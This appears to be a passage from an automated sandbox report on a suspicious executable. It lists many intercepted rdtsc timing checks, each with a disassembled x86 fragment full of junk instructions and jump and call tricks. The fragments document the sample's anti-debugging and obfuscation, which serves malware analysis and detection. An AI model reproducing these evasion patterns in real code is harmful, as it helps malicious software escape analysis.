                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A07 second address: 5D3A16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A16 second address: 5D3A1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3A1C second address: 5D3A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB9E5277427h 0x0000000b jl 00007FB9E5277422h 0x00000011 jnc 00007FB9E5277416h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E1F second address: 593E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Dh 0x00000007 jmp 00007FB9E4B29223h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB9E4B2921Ch 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E56 second address: 593E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277427h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 593E73 second address: 593E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D2EF0 second address: 5D2F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB9E5277421h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3172 second address: 5D319B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB9E4B29224h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9E4B2921Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35AB second address: 5D35BB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35BB second address: 5D35C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35C1 second address: 5D35C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D35C5 second address: 5D35F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB9E4B29223h 0x0000000c jmp 00007FB9E4B2921Dh 0x00000011 push edx 0x00000012 ja 00007FB9E4B29216h 0x00000018 pop edx 0x00000019 pushad 0x0000001a jmp 00007FB9E4B2921Ah 0x0000001f push eax 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D372E second address: 5D3734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D3734 second address: 5D3738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9476 second address: 5D947A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D947A second address: 5D94B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007FB9E4B29224h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push esi 0x00000014 jmp 00007FB9E4B29222h 0x00000019 pop esi 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94B2 second address: 5D94C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9E5277416h 0x0000000a popad 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94C5 second address: 5D94CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94CA second address: 5D94F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277422h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jno 00007FB9E5277418h 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D94F0 second address: 5D9570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB9E4B29218h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov esi, dword ptr [ebp+122D2182h] 0x00000027 mov si, 5E00h 0x0000002b call 00007FB9E4B29219h 0x00000030 jmp 00007FB9E4B2921Ah 0x00000035 push eax 0x00000036 js 00007FB9E4B29229h 0x0000003c push ecx 0x0000003d jmp 00007FB9E4B29221h 0x00000042 pop ecx 0x00000043 mov eax, dword ptr [esp+04h] 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FB9E4B29229h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9570 second address: 5D9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9575 second address: 5D9588 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FB9E4B29216h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9588 second address: 5D958C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9899 second address: 5D989E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D989E second address: 5D98A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D9BBA second address: 5D9BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA23E second address: 5DA249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB9E5277416h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA444 second address: 5DA448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA448 second address: 5DA44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA568 second address: 5DA56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA5ED second address: 5DA5FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FB9E5277416h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DA5FD second address: 5DA601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB6E7 second address: 5DB6EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB6EC second address: 5DB6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jnp 00007FB9E4B2921Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DB542 second address: 5DB560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jl 00007FB9E5277416h 0x0000000c je 00007FB9E5277416h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jg 00007FB9E527741Eh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DE6B8 second address: 5DE6BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DF205 second address: 5DF20A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DDA08 second address: 5DDA12 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B2921Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5DF20A second address: 5DF249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D2A06h] 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D37DEh], edx 0x00000018 push 00000000h 0x0000001a je 00007FB9E527741Ch 0x00000020 or dword ptr [ebp+1245A060h], edx 0x00000026 mov dword ptr [ebp+122D3349h], esi 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB9E5277420h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E1AF4 second address: 5E1B04 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9E4B29222h 0x00000008 jbe 00007FB9E4B29216h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E2D83 second address: 5E2D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E58BC second address: 5E58D5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FB9E4B2921Ch 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E6791 second address: 5E6796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E6796 second address: 5E679B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E884A second address: 5E8850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E797D second address: 5E7981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5E7981 second address: 5E7985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EAA56 second address: 5EAA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EC9A4 second address: 5ECA0D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+1245AD0Fh], ebx 0x00000012 and di, 0868h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FB9E5277418h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov di, E282h 0x00000037 mov ebx, dword ptr [ebp+122D2203h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FB9E5277418h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 sub ebx, 1C389EACh 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 pop eax 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECA0D second address: 5ECA11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ED9FE second address: 5EDA08 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB9E5277416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8A9 second address: 5EE8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8AF second address: 5EE8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EE8B3 second address: 5EE955 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB9E4B2921Bh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FB9E4B29218h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add di, E39Ch 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FB9E4B29218h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d je 00007FB9E4B2921Ch 0x00000053 xor dword ptr [ebp+1245A09Eh], esi 0x00000059 push 00000000h 0x0000005b mov edi, 761D5FD5h 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FB9E4B29228h 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A0C second address: 5F0A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277420h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A20 second address: 5F0A60 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnc 00007FB9E4B29219h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 mov dword ptr [ebp+122D1E7Fh], edx 0x0000001c pop ebx 0x0000001d push 00000000h 0x0000001f mov edi, ebx 0x00000021 jmp 00007FB9E4B29221h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jng 00007FB9E4B29218h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A60 second address: 5F0A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E5277428h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0A7C second address: 5F0AA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB9E4B2921Fh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECC03 second address: 5ECC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5ECC09 second address: 5ECC1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FB9E4B29218h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5EFB8B second address: 5EFBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277427h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F1B29 second address: 5F1B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FB9E4B2921Ch 0x0000000b popad 0x0000000c push eax 0x0000000d jng 00007FB9E4B2922Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB9E4B2921Fh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F1B53 second address: 5F1BA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D222Ah], edi 0x0000000d push 00000000h 0x0000000f sub ebx, dword ptr [ebp+122D29DAh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FB9E5277418h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 sub bl, FFFFFFD4h 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FB9E5277420h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C07 second address: 5F0C88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c jp 00007FB9E4B29216h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FB9E4B29218h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 xor di, EE00h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FB9E4B29218h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov bh, 6Ah 0x0000005b mov eax, dword ptr [ebp+122D1221h] 0x00000061 mov bh, ch 0x00000063 push FFFFFFFFh 0x00000065 movsx ebx, bx 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b jns 00007FB9E4B29218h 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C88 second address: 5F0C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F0C92 second address: 5F0CC8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FB9E4B29225h 0x00000015 jmp 00007FB9E4B29220h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 595995 second address: 5959B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB9E5277422h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959B2 second address: 5959BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959BE second address: 5959C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5959C3 second address: 5959CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F4262 second address: 5F426C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F426C second address: 5F428A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F5384 second address: 5F538A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5F538A second address: 5F538F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDDD4 second address: 5FDDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E527741Bh 0x00000009 pop ebx 0x0000000a jmp 00007FB9E5277420h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5FDDF4 second address: 5FDE08 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E4B29218h 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FB9E4B29216h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62BC1B second address: 62BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
